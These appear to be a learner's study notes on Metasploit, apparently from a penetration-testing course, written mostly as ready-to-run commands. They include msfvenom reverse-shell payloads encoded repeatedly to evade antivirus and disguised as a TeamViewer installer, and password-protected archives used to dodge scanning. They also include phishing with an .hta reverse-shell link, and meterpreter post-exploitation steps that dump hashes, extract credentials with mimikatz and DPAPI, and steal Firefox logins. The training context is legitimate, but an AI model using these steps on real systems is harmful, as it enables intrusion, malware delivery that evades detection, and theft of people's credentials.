Metasploit
Last updated
Last updated
Notes from practice and HTB Academy course on Metasploit
sudo apt update && sudo apt install metasploit-framework install
msfconsole launch metasploit
msfconsole -q launch without banner
/usr/share/metasploit-framework all files are here (in parrot)
<No.> <type>/<os>/<service>/<name> Syntax of a module
| Type | Description |
|---|---|
Auxiliary | Scanning, fuzzing, sniffing, and admin capabilities. Offer extra assistance and functionality. |
Encoders | Ensure that payloads are intact to their destination. |
Exploits | Defined as modules that exploit a vulnerability that will allow for the payload delivery. |
NOPs | (No Operation code) Keep the payload sizes consistent across exploit attempts. |
Payloads | Code runs remotely and calls back to the attacker machine to establish a connection (or shell). |
Plugins | Additional scripts can be integrated within an assessment with msfconsole and coexist. |
Post | Wide array of modules to gather information, pivot deeper, etc. |
search exploit name
help search more details on how to use the help command
show options to see what we need to set
set RHOST 10.10.10.10 to set a target
setg to set an option permanently until the program is restarted
run or exploit to run our exploit once options are set
We can grep in msfconsole if we need to filter our results example: grep meterpreter show payloads
We can use ifconfiginside as well if we do not remember our ip for the LHOST
Encoding the payload in different formats could help with the AV detection.
Shikata Ga Nai (SGN) is one of the most utilized Encoding schemes today because it makes payloads hard to detect.
Example msfpayload windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -b '\x00' -f perl -e x86/shikata_ga_nai
Or msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai
We can iterate the encoding scheme to have more chance of being undetected. msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe Here with -i we iterate 10 times.
If we register a free account on virus total we can get an API key and use msf-virustotal to check if our payloads are detected. Than we can check our payload this way msf-virustotal that we can use with an API key to analyze our payloads. However, this requires free registration on VirusTotal
We can archive our payload and password protect the archive.
rar a ~/test.rar -p ~/test.js
mv test.rar test we remove the rar extension
rar a test2.rar -p test we archive it again and remove the rar extension again
This is an excellent way to transfer data both to and from the target host.
This might raise a flag in the AV mentioning that the file could not be scanned because it was password protected.
The term Packer refers to the result of an executable compression process where the payload is packed together with an executable program and with the decompression code in one single file. When run, the decompression code returns the backdoored executable to its original state, allowing for yet another layer of protection against file scanning mechanisms on target hosts. This process takes place transparently for the compressed executable to be run the same way as the original executable while retaining all of the original functionality. In addition, msfvenom provides the ability to compress and change the file structure of a backdoored executable and encrypt the underlying process structure.
Popular packer software: UPX packer, The Enigma Protector, MPRESS, Alternate EXE Packer, ExeStealth, Morphine, MEW, Themida.
msfvenom --list payloads | grep meterpreter
msfvenom --list formats
Target OS (Win, Linux, Mac)
Language you need (Python, PHP, ...)
Netwok connection types (TCP, HTTPS,...)
use exploit/multi/handler If you want meterpreter commands choose type of payload with meterpreter Set LHOST and LPORT and run to catch the shell
You can see this when typing help
Note: the commands can change depending on your version of meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe
Generate the script with msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACK-MACHINE-IP LPORT=PORT -f psh -o shell.ps1
Serve it to the target with python3 -m http.server port
Set up your listener on msfconsole use multi/handler set payload windows/x64/meterpreter/reverse_tcp set also LHOST and LPORT
exploit -j
run the exploit on the target you should have a shell
list your sessions with sessions
Interact with the desired session using sessions -i number-of-session
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST IP-OF-ATTACK-MACHINE
set LPORT 443
exploit -j
Launch this in the folder where the payload is python3 -m http.server 80
We can now send an email with a link to our reverse shell http://IP-OF-ATTACK-MACHINE/name-of-your-script.hta
When the phishing receptient will execute the file we will get a reverse shell
In your metasploit shell launch sessions
We should see a new meterpreter sessions from our taget machine
To interact with it we can do sessions -i number-of-session
Let's suppose we have a shell
We interact with it using sessions -i number-of-session (type sessions to list the available sessions)
sysinfo will give info on win version, architecture etc
getuid to have current user info
ipconfig to get network info
arp other information about network
netstat -ano to get info on listener and other
`ps to check processes
run post/windows/gather/enum_services enumerate services
run post/windows/gather/enum_applications enumerate applications
run post/windows/gather/enum_domains enumerate domains (works better on msf5 than 6)
route check out routes
We should have a session
We can check our privileges using run post/windows/gather/win_privs
We can get getsystem if not already using getsystem and to check it worked we can use getuid
hashdump will dump the hashes on the machine *Note when the hash ends with 0c089c0 it usually means that the account is probably disabled`
load kiwi will load mimikatz within meterpreter
creds_all
lsa_dump_sam will dump hashes from the sam file
We should have a session (does not have to be admin, needs to be a domain user)
We need to upload mimikatz on the target upload /opt/Tools/mimikatz_trunk/x64/mimikatz.exe C:\\Users\\Public\\mimikatz.exe
shell
cd C:\Users\Public
dir /a C:\users\user\appdata\local\microsoft\credentials
This will list the password files, we will use the smallest on which generally the one we need.
We launch mimikatz: mimikatz.exe
vault::cred will let us make sure that there are creds in the vault
dpapi::cred /in:C:\users\user\appdata\local\microsoft\credentials\<CREDENTIAL-FILE-PREVIOUSLY-SELECTED>
We need to keep aside the guidMasterKey
exit to exit mimikatz
dir /a C:\users\user\appdata\roaming\microsoft\protect and now we can keep note of the sid value that shoudl look like this: 03/07/2022 10:31 AM <DIR> S-1-5-21-3390063331-4123551052-1719781121-1113
dir /a C:\users\user\appdata\roaming\microsoft\protect\S-1-5-21-3390063331-4123551052-1719781121-1113 the file with the guid should be the same guid of the guidMasterKey
dpapi::masterkey /in:C:\users\user\appdata\roaming\microsoft\protect\S-1-5-21-3390063331-4123551052-1719781121-1113\09770ae7-8e52-48cd-8899-45bb271132e7 /rpc
this will output our masterkey value and should look like this: key : 60f202bff3c6e2eaedfc4c28ac1adbdd102ec7dba401157f6f8c2056205507ed4e6d93120ebe48959751c0f2c939e515382d7ffec7bd2b129c8eb89466b31f0f
cred /in:C:\users\user\appdata\local\microsoft\credentials\9FD43B9DAC2EECAA50270662B8E497D5 /masterkey:60f202bff3c6e2eaedfc4c28ac1adbdd102ec7dba401157f6f8c2056205507ed4e6d93120ebe48959751c0f2c939e515382d7ffec7bd2b129c8eb89466b31f0f
We will get the dc password in plaintext it should look like this:
With an active shell session on metasploit
use post/multi/gather/firefox_creds
set SESSION to the ID of your active shell session
exploit
the files will be downloaded in the loot directory, it will be shown where to in the command line
rename every file by checking their original name accordingly to: key4.db, logins.json, cookies.sqlite, cert9.db, signons.sqlite
Download firefox decrypt
And run it python3 firefox_decrypt.py <msf loot directory>
You should see the decrypted credentials on the screen
Databases in msfconsole are used to keep track of our results.
sudo service postgresql status check is PostgreSQL is up and running
If not sudo systemctl start postgresql
sudo msfdb init initiate a Database
sudo msfdb status check if a db has been initiated
sudo msfdb run connect to the db
In case of problem we can reinitiate the database
Can be usse to segregate the different scan results, hosts, infos, loot, etc.
workspace show the current workspace
workspace -a workspace-name add a workspace
workspace -d workspace-name delete a workspace
workspace workspace-name to switch to a workspace
workspace -h for help
db_import file to import files in our database workspace
db_export -f xml file.xml we can specify a format with -f. For help we can run db_export -h
hosts -h will show help on the hosts command that we can use to see stored info in the db about the hosts.
services -h same as host but for services
creds -h same but for stored credentials
loot -h The loot command works in conjunction with the command above to offer you an at-a-glance list of owned services and users. The loot, in this case, refers to hash dumps from different system types, namely hashes, passwd, shadow, and more.
/usr/share/metasploit-framework/plugins is the default plugins directory for every new installation of msfconsole. If a plugin is listed here we can use it.
load plugin-name to load a plugin
sudo cp ./Metasploit-Plugins/pentest.rb /usr/share/metasploit-framework/plugins/pentest.rb we copy our new plugin to the metasploit plugins folder.
We can launch msfconsole and use our new plugin with load pentest
background or ctrl+z to background a session
sessions list active sessions
sessions -i num to open up a specific session
If, for example, we are running an active exploit under a specific port and need this port for a different module, we cannot simply terminate the session using [CTRL] + [C]. If we did that, we would see that the port would still be in use, affecting our use of the new module. So instead, we would need to use the jobs command to look at the currently active tasks running in the background and terminate the old ones to free up the port.
Other types of tasks inside sessions can also be converted into jobs to run in the background seamlessly, even if the session dies or disappears.
jobs -h
exploit -j to run an exploit as a job we can use exploit -h for more help
jobs -l list running jobs
jobs -k kill all the running jobs
We might sometimes need to exploit a vulnerability that does not have a module yet in our Metasploit version.
We can add if we have the ruby code of course (we can often find these on exploitdb or with searchsploit)
We download the ruby file we need and copy it to /usr/share/metasploit-framework/or .msf4/
We can then load them at runtime msfconsole -m /usr/share/metasploit-framework/modules/ or after with loadpath /usr/share/metasploit-framework/modules/
Or we can also just use reload_all
We need to be careful with the naming convention: Always use snake-case, alphanumeric characters, and underscores instead of dashes. Like this
our_module_here.rb
We can use ruby and create our own module. We can for instance adapt a custom python or any other type of script in ruby to use it in metasploit.
In our script we need to include all the modules and methods for our exploit.
| Function | Description |
|---|---|
| This module provides methods for acting as an HTTP client when exploiting an HTTP server. |
| This is a method for generating a first-stage php payload. |
| This method transfers files and handles file clean-up after a session with the target is established. |
| This module provides methods for reporting data to the MSF DB. |
